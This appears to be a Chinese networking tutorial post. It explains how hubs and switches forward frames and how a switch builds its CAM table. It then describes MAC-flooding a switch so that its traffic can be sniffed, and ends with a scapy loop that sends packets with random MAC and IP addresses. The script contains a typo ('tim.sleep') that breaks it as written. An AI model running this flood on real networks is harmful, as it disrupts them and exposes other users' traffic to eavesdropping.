集线器与交换机
集线器和交换机的功能是一样的,都可以实现局域网之间两台主机的通信。
集线器:(如今少用)
局域网中,当主机A向主机B发送数据包时,先要将数据包发送给集线器,由集线器负责转发,可当集线器收到数据包时并不知道那个接口连接着主机B,所以集线器会大量的复制这个数据包,然后向所有的接口都发送一份主机A发送的数据包的副本。结果是局域网中的所有主机都收到了这个数据包,每台主机上的网卡会查看这个数据包的目的(MAC地址)信息,如果该目的不是本机,则丢弃这个数据包,这样只有主机B才会接受并处理这个数据包。
交换机:
相比于集线器,交换机多了“记忆”和“学习”的功能。这两个功能是通过交换机中的CAM表实现的,这张表保存了交换机中的每个接口所连接的主机的MAC地址信息,这些信息可以通过动态学习得到。
局域网中,当主机A向主机B发送数据包时,先要将数据包发送给交换机,交换机收到数据包时会提取出数据包中的目的MAC地址,并查询CAM表,如果能查到对应的表项,就将数据包从找到的接口发送出去,如果没找到,此时就和集线器一样,将数据包复制的副本发给所有接口,此外,交换机还会提取收到的数据包中的源MAC地址,并查询CAM表,如果没有对应的项,则会将这个源MAC地址和接受到数据包的接口作为新的表项插入CAM表中。
交换机的学习时一个动态的过程,每个表项并不是固定的,而是有一个定时器(通常是5分钟),从表项插入到CAM表中开始,当定时器递减到零时,该CAM项就会被删除。
DOS攻击二层交换机:
交换机中的CAM容量是有限的,如果短时间内收到大量的不同的源MAC地址发送来的数据包,CAM表就会被填满。当填满之后,新的条目就会覆盖前面的条目。当正常的数据包到达交换机后,而交换机的CAM表已经被伪造的表项填满了,无法找到正确的接口,只能将数据包广播出去。这时,受到攻击的交换机实际上退化成为了集线器。黑客只需要将自己的网卡设为混杂模式,就可以监听整个局域网的通信。
scapy模块中的RandMAC()和RandIP()可以方便的构造随机的MAC地址和IP地址,也可以生成固定网段的IP地址,方法:RandIP("192.168.1.*")
from scapy.all import *
while True:
packet = Ether(src = RandMAC(),dst = RandMAC())/IP(src = RandIP(),dst = RandIP())/ICMP()
tim.sleep(0.5)
sendp(packet)
print(packet.summary())
247
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
